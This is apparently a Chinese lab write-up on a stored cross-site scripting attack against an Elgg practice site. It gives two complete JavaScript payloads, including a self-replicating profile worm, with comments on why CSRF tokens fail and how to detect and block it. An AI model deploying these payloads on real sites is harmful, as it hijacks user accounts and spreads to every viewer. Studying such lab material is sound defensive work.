首先尋找攻擊入口:
然後在裡面寫入js代碼,如果js代碼太長不能滿足格式長度要求的話那就直接導入js檔案
攻擊代碼如下:
// Stored-XSS demonstration against the Elgg lab site: a script that already runs
// in the victim's origin submits the profile-edit form on the victim's behalf.
// The server-side root cause is that the profile fields are stored and rendered
// without output encoding; the defences this listing walks past are noted inline.
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
// NOTE(review): Host, Keep-Alive, Connection and Cookie are forbidden request
// headers for browser XHR, so setRequestHeader() silently ignores these four
// calls. A same-origin request carries the session cookie regardless, which is
// why cookie attributes (HttpOnly, SameSite) do not mitigate this class of
// attack — output encoding of user-supplied fields does.
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
// The stored payload: a <script> element pointing at a file hosted on the same
// site, written into the victim's own briefdescription field so that the next
// viewer of that profile executes it as well (the "worm" step).
var briefdescription="<script src='http://www.xsslabelgg.com/file/download/57' type='text/javascript'></script>";
// elgg.session.user.* and elgg.security.token.* are globals the page exposes to
// its own scripts; injected script runs in that same context, so the anti-CSRF
// token and timestamp are read directly rather than guessed. This is the lab's
// point: CSRF tokens do not defend against stored XSS.
// accesslevel[...]=2 presumably selects public visibility (ACCESS_PUBLIC in
// Elgg) — verify against the Elgg source.
var content="name="+elgg.session.user.username+"&description=fuckfuckfuckfuckfuckfuck&guid="+elgg.session.user.guid+"&__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&briefdescription="+briefdescription+"&accesslevel[description]=2&accesslevel[briefdescription]=2";
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
當不使用js導入時,攻擊代碼如下:
<script id="worm" type="text/javascript">
// Self-replicating variant: the script copies its own source out of the DOM and
// stores it in the profile's description field, so each infected profile
// re-serves the same script to its next viewer. Detection hint for defenders:
// profile-edit POSTs whose description field contains a percent-encoded
// "<script" string are a strong indicator of this payload; blocking it requires
// encoding the field on output (and ideally a CSP that forbids inline script).
var strCode = document.getElementById("worm").innerHTML;
// Re-wrap the copied source in a script element so the stored copy is
// executable when the profile is rendered. The closing tag is written as
// "<\/script>" so the HTML parser does not treat it as the end of this
// inline script.
var sub_script_begin="worm<script id=worm>";
var sub_script_end="<\/script>";
var sub_script=sub_script_begin.concat(strCode,sub_script_end);
// escape() is the legacy (deprecated) percent-encoder; it is used here so the
// script text survives transport in a form-urlencoded body.
sub_script = escape(sub_script);
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
// NOTE(review): Host, Keep-Alive, Connection and Cookie are forbidden request
// headers for browser XHR, so setRequestHeader() silently ignores these four
// calls; the browser attaches the session cookie to this same-origin request
// on its own.
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
// The anti-CSRF token and timestamp (elgg.security.token.*) are read from the
// page's own globals, which injected same-origin script can see — CSRF tokens
// are not a defence against stored XSS. Only the description field is made
// public here (accesslevel[description]=2, presumably ACCESS_PUBLIC — confirm).
var content="name=".concat(elgg.session.user.username).concat("&description=").concat(sub_script).concat("&guid=").concat(elgg.session.user.guid).concat("&__elgg_token=").concat(elgg.security.token.__elgg_token).concat("&__elgg_ts=").concat(elgg.security.token.__elgg_ts).concat("&accesslevel[description]=2");
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
// Debug pop-up showing the submitted body; it is visible to the victim, so it
// also makes the infection noticeable.
alert(content);
</script>
這是採用worm方式進行的攻擊,當受害者瀏覽時可被感染。